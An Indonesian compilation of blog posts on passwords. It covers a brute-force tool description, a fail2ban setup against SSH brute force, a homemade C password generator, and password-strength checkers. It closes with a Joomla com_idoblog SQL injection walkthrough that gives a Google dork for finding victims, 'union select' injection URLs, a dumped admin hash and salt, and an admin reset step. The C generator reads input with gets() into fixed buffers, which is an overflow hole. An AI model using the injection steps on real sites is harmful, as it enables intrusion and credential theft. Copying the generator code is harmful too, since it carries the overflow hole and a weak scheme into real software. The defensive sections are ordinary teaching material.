NIX Brute Force adalah sebuah tool kecil yang menggunakan Teknik Brute force untuk masuk kesebuah system tanpa  otentikasi terlebih dahulu. tool ini dimaksudkan agar sebuah system harus memiliki password yang kuat, bukan password yang dapat dengan mudah ditebak atau bisa dengan cepat ditembus dengan teknik Brute Force. Tujuan dari NIX adalah untuk mendukung berbagai service yang memungkinkan kita untuk melakukan remote authentication seperti : MySQL, SSH, FTP, IMAP. Hal ini didasarkan pada NIX Proxy checker.

FiturNIX :

  • Dasar Otentikasi dan mendukung Mode SSL Standardan HTTPS
  • HTTP/SOCKS 4 dan 5 dukungan proxy.
  • Deteksi otomatis form dan input manual form konfigurasi
  • Pengacakan/Random Wordlist melalui macro
  • Otomatis mematikan proxy yang sudah tidak bisa dipakai, proxy yang sudah tidak bisa diandalkan, dan ketika mekanis perlindungan situs memblok proxy.
  • Pengacakan proxy terpadu untuk mengalahkan mekanisme perlindungan tertentu.
  • Dengan ke AKURATan 99% untuk hasil yang sukses atau hasil yang gagal.
  • Advanced coding dan pengaturan time out, sehingga membuat tool ini sedikit lebih unggul dibandingkan dengan tool sejenis lainnya.
Menangkal serangan bruteforce di berbagai service server dengan Fail2ban

Tutorial kali ini saya akan membahas mengenai bagaimana mempertahankan server dari serangan usil “bruteforce”

apa itu bruteforce ?

bruteforce itu adalah tehnik untuk mencoba login kesuatu service tertentu dengan username dan password yang telah di list ( dalam arti lebih dari satu ) untuk mencoba kemungkinan login dengan list tersebut.

Tester :

attacker : backtrack

target : ubuntu server 8.0.4

untuk menangkal masalah ini , akan saya kenalkan salah satu tools yang gampang cara penginstalan dan cara confignya .. hingga seorang sys admin pemula pun dapat menkonfigurasinya dengan mudah ..sebagai contoh uji coba di server ubuntu 8.0.4

bagi sesama pengguna keluarga debian seperti ubuntu , kita install tools tersebut dengan mengetikan

#sudo apt-get install fail2ban

sesudah terinstall dengan baik langkah selanjutnya ada mengcopy file konfigurasi

#sudocp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

lalu kita coba edit file tersebut

#sudo vim /etc/fail2ban/jail.local

ok…saya akan coba jelasin satu2 mengenai file konfigurasinya dan mencoba untuk memberikan hasil tester..

konfigurasi whitelist ip / igonoringip
konfigurasi ini untuk mendaftar ip yang tidak akan di banned walau melakukan kesalahan login padawaktu yang ditentukan

konfigursi email report
konfigurasi ini untuk menentukan kemana fail2 ban untuk mereport

konfigurasi service-service yang akan di protect [ jail ]

[*] service ssh

Pada konfigurasi file terdapat konfigurasi ssh

[ssh]

enabled = true // mengaktifkan proteksi terhadap ssh

port = ssh // [ port yang di gunakan ssh / anda dapat menggantinya secara numerik ]

filter = sshd // service tipe

logpath = /var/log/autho.log // path file log

maxretry = 6 // maksimal bruteforce attemp sebelum di banned di ip table

tested attacker from :
192.168.1.8 operating system backtrack 5 R1

hasil :

email saya setting kezee@indonesianbacktrack.or.id

 From fail2ban@ITSecurity Thu Jul 16 04:59:24 2009

 Subject: [Fail2Ban] ssh: banned 123.45.67.89

 Hi,

The ip 192.168.1.8 has just been banned by Fail2Ban after

 5 attempts against ssh.

Here are more information about 192.168.1.8:

{whois info}

Lines containing IP:192.168.1.8 in /var/log/auth.log

Jul 16 04:59:16 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:18 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:20 example.com sshd[10390]: Failed password for root from 192.168.1.8 port 46023 ssh2

 Jul 16 04:59:21 example.comsshd[10394]: reverse mapping checking

getaddrinfo for 192.168.1.8 [192.168.1.8] failed – POSSIBLE BREAK-IN ATTEMPT!

 Jul 16 04:59:22 example.com sshd[10394]: Failed password for root from 192.168.1.8 port 46024 ssh2

 Regards,

Fail2Ban

ketika saya cek log

#cat /var/log/auth.log

danketikasayacek di iptable
#sudoiptables -L

hmm…sangat work

ada beberapa konfigurasi yang tidak saya jelaskan satu persatu di sini , silahkan anda mencobanya sendiri ..

konfigurasi-konfigursi lain

[*] xinetd-fail

 [*] ssh-ddos

 [*] apache

 [*] ftp-server

 [*] mail-server

 [*] dns-server

2. Generate Password

SIMPLE PASSWORD GENERATOR

—// Intro \\ —

Menentukan password yang tepat memang gampang-gampang susah. Menggunakan password yang sederhana seperti user123, 123456, atau abc123 memang membuat kita dapat dengan mudah mengingatnya, namun password seperti itu sangat mudah ditebak dan tentunya berbahaya. Bersumber dari wikipedia dan pendapat saya sendiri,password yang baik mempunyai ciri-ciri sebagai berikut:

  • Terdiri dari kombinasi huruf besar, huruf kecil, digit, dan karakter khusus seperti !#$%^& dsb.
  • Panjang password minimal 8 karakter.
  • Password tidak ada hubungannya sama sekali dengan user name. ( ex : hidrogen_mr, admin123 )
  • Bukan Kata yang berasal dari kamus ( ex : inside, login, dll )
  • Bukan berupa karakter berurutan pada keyboard ( ex : asdf, qwerty )
  • Tidak mudah ditebak ( ex : admin, 1234, password )
  • Jangan menggunakan informasi personal seperti nama pacar, tanggal
    lahir, tempat lahit, dsb )
  • Contoh password yang baik : arr19*BbN1#

Tentu bukan hal yang menyenangkan jika tiba-tiba website pribadi anda diambil alih oleh orang lain gara-gara password cpanel terlalu mudah untuk ditebak ( ex : username : admin dan password : admin ). Bahkan yang lebih parah, sang pembajak bisa menyalahgunakan account anda yang sudah berhasil mereka “bobol” untuk kepentingan pribadi.

Tapi mengapa masih banyak user menggunakan password yang “jelek” padahal jelas-jelas itu tidak aman ?Jawabannya jelas karena password yang “jelek” sangat mudah untuk kita ingat.

Tentu hal yang baik jika orang lain tidak bisa mengakses dan menebak-nebak password e-mail pribadi kita. Namun jika kita sendiri yang tidak bisa mengakses e-mail gara-gara lupa password ?hum.. jelas bukan hal yang menyenangkan bukan ?

Ok, mungkin intro diatas sudah seringkali anda baca dan ketahui dengan baik.
Hanya sekedar mengingatkan bagi yang masih kurang berhati-hati.

–// Simple Password Generator \\—

Apa itu password generator ? Sederhananya password generator adalah aplikasi yang digunakan untuk meng-generate ( menghasilkan ) password. Password generator disini mempunyai fungsi yang berbeda dengan password generator yang digunakan untuk menyusun dictionary. Cara kerja password generator ini adalah menerima input berupas user name dan global key, lalu dengan rumus hash tertentu, program akan menghasilkan password berdasarkan kedua input tersebut.

Berikut Gambaran Penggunaanya :

Insert Account Name : user@yahoo.com
Insert Key : ganteng
Your Password : aTmMgbGPA

Insert Account Name : user@gmail.com
Insert Key : ganteng
Your Password : [UmMgTKGA

Dengan menggunakan password generator ini, kita cukup mengingat satu buah key saja ( ganteng ). Jika anda salah memasukan key, program tetap akan menghasilkan password, namun tentu saja hasilnya berbeda seperti contoh berikut :

Insert Account Name : user@yahoo.com
Insert Key : cantik
Your Password : XnZOv_CJA

Insert Account Name : user@gmail.com
Insert Key : ganteng
Your Password : ^kZOvYOAA

Mengapa disebut “simple” ? Karena program yang kita buat sangat sederhana ! Kita akan menggunakan metode-metode hashing yang sederhana untuk menggenerate password. Kalau begitu tidak aman dong ?Yup, memang tidak begitu aman, namun masih lebih baik daripada menggunakan abc123. Berikut karakteristik password generator yang akan kita buat :

  • Password yang dihasilkan selalu mempunyai panjang 9 karakter
  • Password dapat berupa kombinasi huruf besar, huruf kecil, angka, dan
    beberapa karakter khusus. Namun semua karakter memiliki nilai ASCII antara 65 (‘A’) s/d 122 (‘z’).
  • Password yang sudah digenerate secara default hanya ditampilkan dilayar (tidak disimpan di file lain )

—// Algoritma \\—

Sebelum mulai, ada baiknya kita jelaskan sedikit mengenasi fungsi “hash”, teman-teman pasti sudah banyak yang tahu, apa itu hash. Hash adalah suatu fungsi untuk mengubah karakter / string menjadi angka. Contoh dari fungsi hash yang terkenal yaitu md5, md4, atau sha.

Baik, kita langsung mulai saja.Sekarang, anda belum butuh compiler, cukup perhatikan baik-baik pernjelasannya.

Pernulis menggunakan compiler dev c++ versi 4.9.9.2 dari Bloodshed Software ( dapat anda download di situsnya http://www.bloodshed.net ) Runing on Windows XP + SP 2.
Karena program yang kita buat sederhana,algoritmanyapun kita buat sederhana saja (agar sederhana sempurna, he3..) Berikut algoritmanya :

  1. Baca Account Name, kita simpan ke dalam variabel bernama user
  1. Baca key, kita simpan ke dalam variabel bernawa key
  2. lu = panjang user
    lk = panjang key

User name dan key ini kita gunakan untuk menggenerate passwordnya. Metode yang digunakan adalah metode simple-XOR dengan sedikit modifikasi. Misalnya kita akan tampung hasil XOR pada variabel bernama buf maka :

buf[i] = user[i] XOR key[i] // nilai i berkisar dari 0 sampai lu

Pada kenyataanya, panjang dari key seringkali lebih pendek daripada panjang
user. Untuk itu fungsi XOR akan kita modifikasi sehingga jika karakter pada key tidak cukup untuk menjadi pasangan XOR user, maka key digunakan lagiuntuk menemani XOR karakter selanjutnya. contoh key = abc dan user = hidrogen

buf[0] = user[0] XOR key[0] = h XOR a
buf[1] = user[1] XOR key[1] = i XOR b
buf[2] = user[2] XOR key[2] = d XOR c
buf[3] = user[3] XOR key[0] = r XOR a
buf[4] = user[4] XOR key[1] = o XOR b
buf[5] = user[5] XOR key[2] = g XOR c
buf[6] = user[6] XOR key[0] = e XOR a
buf[7] = user[7] XOR key[1] = n XOR b

Caranya mudah, cukup dengan modulo. Operator modulu ( % ) ini juga yang nanti akan kita gunakan agar panjang output selalu 9 karakter. Maka fungsi kita menjadi :

buf[i] = user[i] XOR key[i mod lk] ;

Ternyata masih ada masalah yang cukup mengganggu. Dengan fungsi seperti ini, maka baik key = aaa atau key = aaaa akan menghasilkan output yang sama. Untuk itu kita modifikasi sekali lagi fungsi ini. Ada ide ? Sederhana saja, tambahkan output dengan panjang dari key (lk)

buf[i] = ( user[i] XOR key[i mod lk] + lk )

Hmm..sekarang fungsi kita sudah tampak lumayan. Masih ada yang perlu diperbaiki?Yupz, masih ada lagi yang dapat kita perbaiki. Dalam beberapa kasus seperti user dan key yang terlalu pandek juga user yang karakternya berulang. Password yang dihasilkan seringkali menggunakan karakter yang sama. contoh, jika usernya aaaaaaaaa dan key nya bb maka pasword yang dihasilkan adalah KFFFFFFFA.

Bagaimana memperbaikinya……? Kita pertahankan azas kesederhanaan, cukup tambahkan fungsi kita denngan nilai i. Sehingga fungi menjadi :

  1.  buf[i] = ( user[i] XOR key[i mod lk] + lk ) + i ; // untuk i = 0 s/d lu

Dengan fungsi yang diperbaharui ini, karakter yang dihasilkan nantinya menjadi lebih acak.Masih mau lanjut ?Sementara ini sampai disini saja dulu, silahkan anda modifikasi sendiri fungsinya agar output yang dihasilkan menjadi jauh lebih baik.Atau bahkan anda bisa menghilangkan perubahan yang anda rasa tidak perlu.

Nah..sekarang kita sudah punya data mentah yang disimpan dalam variabel buf, yang akan kita lakukan selanjutnya adalah, menghasilkan password matang dari data mentah yang sudah kita miliki. Seperti seudah disebutkan sebelumnya, password matang mempunyai beberapa karakteristik yaitu mempunyai panjang 9 karakter dan karakter karakternya mempunyai nilai ASCII antara 65 sampai 122.

Sekarang, bagaimana caranya agar password yang dihasilkan mempunyai panjang tepat 9 karakter ? he3..sekali lagi kata akan menggunakan metode yang sederhana. Idenya adalah, kita kan membagi semua nilai dalam varabel buf[] secara “tidak merata”, masksudnya begini. Misal panjang user 12, tentu panjang buf[] juga 12, ke 12 nilai tersebut akan kita jumlahkan kedalam variabel yang nantinya menampung password.
Karena panjang password hanya 9 karakter.kita akan memanfaatkan lagi fungsi modulo. Baik ,kita akan simpan password dalam variabel pass[], maka :

  1.  untuk i dari 0 s/d lu dimana lu = panjang user = panjang buf :

pass[i&8] = pass[i%8] + buf[i]

Hehehe..sederhana bukan ? Kita sudah mempunyai variabel pass dengan 9 nilai didalamnya. Sekarang tinggal bagian finishing. Kita akan ubah agar nilai-nilai dalam variabel pass selalu diantara 65 s/d 122. Caranya mudah cukup kita modulo dengan 57 ( 122 – 65 ) lalu tambahkan dengan 65.

pass[i] = pass[i] % 57 + 65

Nah..sebenarnya fungsi-fungsin kita sudah lengkap untuk menggenerate password. Namun, alangkah baiknya jika kita modifikasi lagi aga password yang dihasilkan nantinya lebih acak dan sulit ditebak. Mengapa tidak menggunakan fungsi random saja ? Hahaha, jika kita gunakan fungsi randon maka user dan key yang sama akan menghasilkan password berbeda setiap eksekusi, celaka dong, he3.. Ini adalah fungsi yang saya gunakan dalam program nantinya :

pass[i] = ( (pass[i] % 24 + i * 6 + 1988 ) % 57 ) + 65 ;

Darimana angka 24, 6, dan 1988 ?itu adalah tanggal lahir saya, he3.. benar-benar tidak bisa dipertanggung jawabkan ;p
Jika setiap langkah kita tulis dalam bahasa C, maka akan tampak seperti berikut ini :

-| step 1;

gets(user);

-| step 2;

gets(key);

-| step 3;

lk = strlen(key);
lu = strlen(user);

-| step 4;

for ( i = 0 ; i < lu ; i++ ) {
buf[i] = (user[i] ^ key[i%lk])+strlen(key)+i;
}

-| step 5;

for ( i = 0 ; i < lu ; i++ ){
pass[i%8] += buf[i] ;
}

-| step 6;

for ( i = 0 ; i < 9 ; i++ ){
pass[i] = ((pass[i]%24+i*6+1988)%57)+65;
}

-| step 7 ( cetak passwordnya )

for ( i = 0 ; i < 9 ; i++ ) {
printf(“%c”,pass[i]);
}

Yup, sekarang fungsi-fungsi yang kita miliki sudah lengkap untuk menyusun sebuah password generator sederhana. Sekali lagi, metode yang digunakan sangat trivial.. Saya bukan ahli kriptografi, untuk teknik-tenik yang lain silahkan anda tanya ahlinya seperti mamasexy atau cR45H3R.

–// Important Note ! \\—

Secara umum, algoritma yang digunakan masih jauh dari kata aman. Selain algoritma XOR yang terlalu sederhana dan mudah dipecahkan, teknik padding nya pun terkesan asal-asalan dengan melibatkan tanggal lahir sebagai “pad” nya.

Namun yang perlu anda ketahui, ini adalah konsep. Tentu saja algoritma yang sederhana ( meskipun tidak bisa dipertanggungjawabkan ) akan membuat tulisan ini lebih dimengerti dan diaplikasikan. Selanjutnya adalah tugas anda untuk memperbaiki program sederhana ini menjadi jauh lebih secure.Meungkin dengan teknik hashing yang lebih canggih atau bahkan algoritma yang sama sekali beda dengan apa yang sudah saya paparkan.
Walau begitu, penggunaan password generator ini masih jauh labih aman daripada menggunakan password trivial seperti “admin123″, “linda_sayang”, dll. Perlu diingat, gunakan master password yang benar-benar “secure” dan sulit ditebak ( Lebih lanjut mengenai password yang kuat silahkan lihat di wikipedia ).

–// Source Code \\—

Berikut Source code jadi yang sudah saya tambahkan embel-embel

//——————————-cut here———————————-\\

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// simple password generator
// mr_hidrogen 22-11-06 ( wildan.rahman@gmail.com – site : blogipb.com )
// gunakan sesuka anda

int main() {
char key[100];
char user[100];
int buf[50];
int lu,lk ;
int i,j;
int pass[9];

for (i=0; i<9;i++) pass[i]=0;
printf(“Insert Account Name : “); gets(user);
printf(“Insert Key : “); gets(key);
lk = strlen(key);
lu = strlen(user);

for ( i = 0 ; i < lu ; i++ ) {
buf[i] = (user[i] ^ key[i%lk])+strlen(key)+i;
}

for ( i = 0 ; i < lu ; i++ ){
pass[i%8] += buf[i] ;
}
for ( i = 0 ; i < 9 ; i++ ){
pass[i] = ((pass[i]%24+i*6+1988)%57)+65;
} // 24 6 1988 is my birthday, he3..

printf(“Your Password : “);
for ( i = 0 ; i < 9 ; i++ ) {
printf(“%c”,pass[i]);
}

printf(“\n”);

system(“pause”);
}

//——————————-cut here———————————-\\

—// Referensi \\—

[1] cR45H3R, “Algoritma Enkripsi One Time Pad”, echo zine 14
[2] digital junkie, “Simple Password Management”, echo zine 13
[3] http://en.wikipedia.org/wiki/Password_strength
[4] http://browsex.com/XOR.html

[—————————————EOF———————————]

Penggunaan Generator Password

http://strongpasswordgenerator.com/

Pada umumnya jika anda menggunakan password generator, maka kombinasi angka, huruf besar, huruf kecil serta bentuk symbol lainnya, itu akan tersusun secara acak.  Manfaat lain dalam penggunaan password generator yaitu mudah dalam membuat password, serta anda juga harus mudah mengingatnya baik itu dengan cara menulisnya dengan sesuatu yang bisa anda simpan sendiri. Dalam penggunaan ini juga menyulitkan Cara pembobol password, karena dengan generator password tersebut angka dan karakter maupun symbol tersusun secara acak tanpa batas, jadi pembobol password kesulitan mendapatkan password anda, karena prosesnya lama apabila anda menggunakan generator password dengan karakter yang cukup panjang. Efektif dalam penggunaan generator password  adalah dengan pemanfaatan pemrograman javascript, karena daripada melakukan download software dari internet itu juga kurang efektif kalau enggak yang portable, meskipun cara penggunaannya adalah sama yaitu degan cara mengatur panjang atau pendeknya password yang anda buat dengan berbagai pilihan karakter.

Cara Pembobolan Password

Berbagai macam cara metode untuk membobol password, biasanya Hacker  yang dapat diartikan dengan programmer yang pandai dan senang dalam mengutak atik sesuatu / modal nekat atau disebut juga dengan neritik (dalam bahasa jawanya ). Bagi seorang hacker, perlindungan terhadap sistem komputer adalah tantangan ,karena  mereka biasanya akan mencari  cara bagaimana caranya menembus password, firewall, acces key, dan sebagainya. Walaupun demikian hacker bisa dibedakan atas dua golongan, golongan putih dan golongan hitam.

Yang saya tau mengenai pencurian password ataupun pembobolan password yaitu dengan cara,

  1. Menebak nebak password yang mudah diingat , biasanya para pemakai password menggunakan password yang mudah diingat misalnya dengan cara memakai nomer hp nya, namanya sendiri, atau juga biasanya ia menggunakan kata kata dari kamus bahasa inggris yang mudah diingat juga.
  2. Brute Force, yaitu upaya untuk memecahkan kode password dengan menggunakan bantuan software yang didalam software tersebut mempunyai banyak kode kode yang berupa angka, huruf besar, huruf kecil, dan jenis symbol symbol lain dengan berbagai kombinasi.
  3. Sosial Engginering, Serangan ini biasanya melibatkan manusia sendiri yang sedang kurang konsentrasi dengan lawan bicara. Biasanya pelaku hacker mencoba membuka informasi rahasia dengannya dengan cara mengelabui korbannya.
  4. Membuat halaman login palsu pada address bar, biasanya melalui kiriman e-mail palsu, supaya korban mengklik halaman login palsu itu, terus kemudian sikorban disuruh melakukan pengisian username  beserta password dalam halaman login tersebut. Jadi secara tidak sadar maka sikorban telah tertipu dengan segaja memasukkan identitas mereka.

Jadi saya sarankan bila anda membuat account ; sebaiknya jangan anda tampilkan alamat email anda, bila anda menampilkan alamat email itu berarti bahwa anda sudah menganggap alamat email anda itu untuk umum, masalah penggunaan password yang cukup panjang itu juga membuat agar pelaku pembobolan password dengan bantuan software / Brute Force itu memerlukan waktu yang cukup banyak, anda jangan khawatir karena password yang panjang kemungkinan malah anda sendiri yang lupa_ tapi ingat pasti anda sering dan terbiasa menggunakan password yang panjang

Apa ya harus memakai password yang panjang ??

Jawabanya ya tidak harus anda menggunakan password yang panjang jika anda menganggap account anda itu sudah aman dari gangguan, semuanya berawal dari ketenangan perasaan anda sendiri.

Serangan mata mata keylogger = kemungkinan serangan dari dalam yang berupa software yang terinstal berbahaya pada komputer anda.

3. Cek Kekuatan Password

Cek Kekuatan Password di Windows Apps

Sebagian besar aplikasi Windows (Google Talk.MS Outlook, Firefox, Internet Explorer, dan sebagainya) memiliki form login sehingga pengguna bisa menyimpan username dan password. Form login sangat memudahkan pengguna karena mereka tak perlu selalu harus memasukkan detail login. Kelemahannya, sistem operasi Windows tidak mempunyai opsi agar bisa mendaftar semua detail login yang berada di software untuk memverifikasi integritas username dan password.

Password Security Scanner adalah aplikasi yang bisa menemukan semua detail login yang tersimpan di komputer sehingga kamu bisa memeriksa kekuatan password dan atribut lain tanpa perlu mengekstraksi detail login dari aplikasi. Aplikasi multi bahasa ini bisa digunakan pada semua versi sistem operasi Windows. Saat ini Password Security Scanner mampu men-scan beberapa aplikasi, yaitu Internet Explorer 4.0 -6.0, IE 7.0 – 9.0, Mozilla Firefox (semuaversi), VPN, MSN/Windows Messenger, MS Outlook, dan Windows Live Mail.

Unduh aplikasi pada alamat: http://www.nirsoft.net/utils/password_security_scanner.html. Begini cara memeriksa  kekuatan password:

  1. Jalankan unzip pada paket aplikasi yang kamu unduh.
  2. Klik dua kali pada file Password Scan.exe. Aplikasi akan mendata semua detail login yang tersimpan pada aplikasi yang terinstal pada sistem operasi Windows.
  3. Jika kamu ingin memfilter daftar detail login, maka klik Advanced Options dari menu Options. Kamu akan bisa menampilkan password yang tidak aman dari mulai yang jumlah karakternya sedikit atau password yang kurang kuat. Berikan tanda centang pada opsi Display only items with password length lower than, dan Display only items with password strength lower than. Klik OK untuk menerapkan pengaturan yang telah kamu buat.
  4. Klik dua kali pada item di dalam daftar untuk secara lengkap menampilkan informasi kekuatan password. Kamu akan mendapati kotak dialog terpisah, lengkap dengan atribut kekuatan password, sehingga kamu bisa memeriksa Password Type, Application, User Name, Computer Name, sampai Windows User. Klik OK setelah kamu selesai mengamati kekuatan password pada item tersebut.

Cek Kekuatan Passwordmu Dengan Cracklib-Chek

password merupakan kata kunci untuk dapat masuk ke dalam sebuah akun, sistem komputer atau yang lainnya. kekuatan password memegang peranan sangat penting dalam menjaga keamanan data-data disamping infrastruktur keamanan yang lain. ada banyak aplikasi yang bisa digunakan untuk mengetahui kekuatan password kita, salah satunya adalah cracklib-check yang sudah menjadi bawaan dari gnu/linux.

contoh password yang buruk

[handry@madesu ~]$ echo “12345” | cracklib-check
12345: it is too short

[handry@madesu ~]$ echo “1234567890” | cracklib-check
1234567890: it is too simplistic/systematic

password yang cukupbaik

[handry@madesu ~]$ echo “h4nd121T@mp4n” | cracklib-check
h4nd121T@mp4n: OK

sebenarnya untuk mengetahui kekuatan password tidak perlu menggunakan aplikasi apapun, cukup memilih password yang lebih dari 8 karakter dan banyak bergaul dengan anak alay yang biasa menulis status dengan gabungan huruf kecil, besar, angka dan karakter lainnya…

aplikasi cek  kekuatan password, berikut skripnya :

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv=”content-type” content=”text/html; charset=utf-8″ />
<title>Aplikasi Cek Password – RamdhaniPurnamaAlam</title>
<script src=”jquery.js”></script>
<link href=’http://fonts.googleapis.com/css?family=Vollkorn&#8217; rel=’stylesheet’ type=’text/css’>
<link rel=”stylesheet” type=”text/css” href=”style.css” />
<script src=”script.js”></script>
</head>

<body bgcolor=”blue”>
<div id=”container”>

<div id=”header”>
Nama    : RamdhaniPurnamaAlam<br>
Kelas    : 3-A<br>
NPM        : 1103037<br>
<h2>AplikasiCek Password<h2>

</div>

<div id=”content”>

<form id=”register”>
<label for=”password”>Password : </label>
<input name=”password” id=”password” type=”password”/>
<span id=”result”></span>
</form>

</div>

<div id=”footer”>
by RamdhaniPurnamaAlam
</div>

</div>
</body>
</html>

sekian yang saya buat aplikasi cek kekuatan password. Terimakasih.

 CekKekuatan Password

Posted on February 9, 2013 by regasetiadipermana

pengertian password

Password adalah kode rahasia, kata sandi yang merupakan kunci untuk bisa mengakses atau membuka suatu sistem yang dikunci.Password juga bisa disebut dengan kunci.

Password merupakan rahasia, jika ada orang lain yang mengetahui password tersebut, bisa jadi orang yang tidak berhak tersebut akan menghapus atau mencuri berkas-berkas yang ada. Jadi sebaiknya dalam selang waktu tertentu password sebaik nya diganti dan agar kerahasiaan nya terjamin, sebaiknya hal-hal berikut ini tidak digunakan :

  • Nama atau nama panggilan
  • nama orang tua, pacar, saudaraatau orang dekat
  • sesuatu yang mudah ditebak, seperti nama kota, jenis musik yang disukai oleh orang yang mempunyai password tersebut

Password yang baik adalah password yang susah ditebak oleh orang lain dan mudah di ingat oleh Anda dan hal-hal yang disarankan:

  • Menggunakan kombinasi huruf besar dan huruf kecil
  • Mengandung angka dan karakter  tanda baca (seperti ?,! dll)
  • Panjangnya minimal 6 karakter lebih panjang lebih baik
  • dan update password anda minimal 2 minggu sekali.

Cara Mudah Cek Kekuatan / Kerumitan Password dengan JQuery

iRate This

Kalau kita lihat judul diatas, mungkin beberapa pembaca sempat bertanya kenapa c harus cek kekuatan/kerumitan password?Ini dilakukan karena beberapa dari kita sering memasukan password yang mudah di tebak.Misalnya 1234, abcd ,tanggal lahir dsb.  Padahal kalau password kita mudah ditebak maka bukan tidak mungkin akun kita bisa di bobol oleh orang yang tidak bertanggung jawab.

Oleh karena itu, sebaiknya kita menggunakan password strength meter agar password yang dimasukan oleh pengguna web bisa dilihat apakah password nya terlalu pendek, lemah (weak), medium atau pun strong. Dengan adanya pengecekan tersebut, diharapkan pengguna web kita bisa memasukan password dengan kombinasi yang cukup rumit agar tidak mudah dibobol.

Requirement :
– Download Jquery
– Download JqueryPStrength
– Download Editor PHP/HTML misalnya Adobe Dreamweaver, Notepad ++, CodeLobster, dll.

Cara membuatnya :
1. Ketik kan kode berikut di editor kesayangan anda.

view source

print?

01 <html>
02  <head>
03  <title>Untitled Document</title>
04  <scripttype="text/javascript"src="jquery.js"></script>
05   <scripttype="text/javascript"src="jquery.pstrength-min.1.2.js"></script>
06   <scripttype="text/javascript">
07         $(function()
08         {
09             $('#txtPass').focus(function()
10             {
11                 $('#txtPass').pstrength();
12             });
13         });
14         </script>
15     </head>
16 <body>
17     <formaction=""method="post">
18     Password : <inputtype="text"name="txtPass"id="txtPass"/>
19     </form>
20 </body>
21 </html>

Penjelasan Kode :
– Baris 4 : Karena kiata menggunakan Jquery, maka kitaharus sertakan library jquery
– Baris 5 : Sertakan Plugin Jquery yaitu jquery pstrength agar jquery bisa cek kekuatan password
– Baris 9 : $(‘#txtPass’).focus  artinya ketika kursor berada di inputan yang id nya adalah txt Pass (baris ke-18) maka kerjakan kode di bawah ini
– Baris 11 : $(‘#txtPass’).pstrength artinya cek kekuatan password yang diketikkan di inputan yang ber id txtPass
– Baris 18 : M mebuatan inputan (isian) text yang bernama txtPass dan ber id txtPass.

2. Save / simpan dengan nama cekPassword.html
3. Buka cekPassword.html di browser kesayangan anda. Like Loading…

http://belajarbuatprogram.wordpress.com/2011/10/29/cara-mudah-cek-kekuatan kerumitan-password-dengan-jquery/

4.Hack Password

Bisa dilihat pada link  Praktisk_hacking

Apa itu Hacking…???

Hacking Adalah sebuah Seni Ketrampilan Mengoperasikan / Mengendalikan / Menguasai Komputer Mencakup Semua Aspek Mulai Dari Level Dasar Sampai Level Tertinggi Baik Dalam Komputerisasi Dasar, Pemrograman Dasar Sampai Dengan Jaringan Yang Sangat Rumit. Sedangkan orang yang mampu melakukan itu semua di beri julukan “hacker”.

hacker : adalah orang yang mempelajari, menganalisa, memodifikasi, menerobos masuk ke dalam komputer dan jaringan komputer, baik untuk keuntungan atau dimotivasi oleh tantangan.
Hacker umumnya JUSTRU tidak sangat ingin di publikasikan apalagi sampai menggembar-gemborkan dirinya adalah hacker. Justru hacker cenderung diam dan tertutup dengan status sosial yang sangat normal. Bahkan sangat tidak mungkin anda sangka seseorang yang pendiam dan lugu bahkan culun adalah seorang hacker (bukan berarti semuanya). Hacker umum-nya tidak merusak, mereka kebanyakan mencari informasi/data penting tingkat tinggi bukan untuk mencuri/kesenangan tapi lebih cenderung untuk mengetes, bukan mengetes kemampuan mereka tapi system yang sedang mereka hadapi. Kebanyakan hacker tidak sangat mudah di kalahkan mereka mampu menguasai dan memutar balik keadaan karena mereka bisa di anggap satu level dengan system…
Hacking juga bisa dengan EXPLOIT

Tutorial Joomla (Hacking)

Pendahuluan: Joomla! sebagai Stabil-Kendali Paket mungkin unhackable dan
Jika seseorang mengatakan bahwa Joomla HACKED sampah, bicara!
Namun orang masih hack situs yang menggunakan Joomla sebagai Content Management System?!?
Joomla terbuat dari komponen dan modul, dan ada beberapa pengembang terpisah dari
tim resmi yang menawarkan solusi untuk meningkatkan Joomla.
Itu komponen dan modul mede oleh pengembang yang lain titik-titik lemah!

Aku meng-hack situs yang menggunakan Joomla! v1.5.6 dan setelah itu v1.5.9 melalui IDoBlog v1.1, tapi aku tidak bisa mengatakan bahwa saya hack Joomla!

Mencari Exploit Dan Target: Kedua langkah bisa masuk urutan yang berbeda, tergantung apa yang Anda temukan target pertama atau mengeksploitasi …

Google dork: inurl: “option = com_idoblog”
Datang dengan hasil untuk sekitar 140.000 halaman

Joomla Komponen idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity

Eksploitasi dapat dipisahkan dalam dua bagian:

Bagian I
index.php option = com_idoblog & tugas? = profile & Itemid = 1.337 & userid = 62
Bagian ini membuka halaman blog Admin dan jika halaman Admin tidak ada, mengeksploitasi tidak akan bekerja (tidak sepenuhnya dikonfirmasi)

Bagian II

Bagian ini mencari username dan password dari tabel jos_users

Pengujian Kerentanan

Nonaktifkan gambar untuk loading halaman lebih cepat:
[Firefox]
Tools >> Options >> Content (menu tab) >> dan ‘Muat gambar secara otomatis’ unclick

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Situs beban normal …

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Situs konten blog Profile Admin

Pergi ke:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1–
Situs rentan

Inject Sasaran

Buka reiluke SQLiHelper 2.7
Dalam copy Sasaran

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
dan klik Inject
Ikuti langkah-langkah standar sampai Anda menemukan Nama Kolom, sebagai akibat yang kita miliki

Perhatikan bahwa mengeksploitasi dari inj3ct0r tidak akan bekerja di sini karena mencari meja jos_users dan seperti yang Anda lihat
target kami menggunakan jos153_users tabel untuk menyimpan data

Biarkan Dump nama pengguna, email, password dari jos153_users Nama Kolom. Klik pada Dump Now

username: admin
email: info@site.com
sandi: 169fad83bb2ac775bbaef4938d504f4e: mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x menggunakan md5 hash untuk password. Ketika password yang dibuat, mereka hashed dengan
32 Karakter garam yang ditambahkan ke akhir dari string password. Sandi akan disimpan sebagai
{TOTAL Hash}: {} SALT ORIGINAL. Jadi untuk hack bahwa password memakan waktu dan waktu …

Cara termudah untuk hack adalah untuk mereset password Admin!

Admin Password Reset

Pergi ke:
http://www.site.com/index.php?option=com_user&view=reset
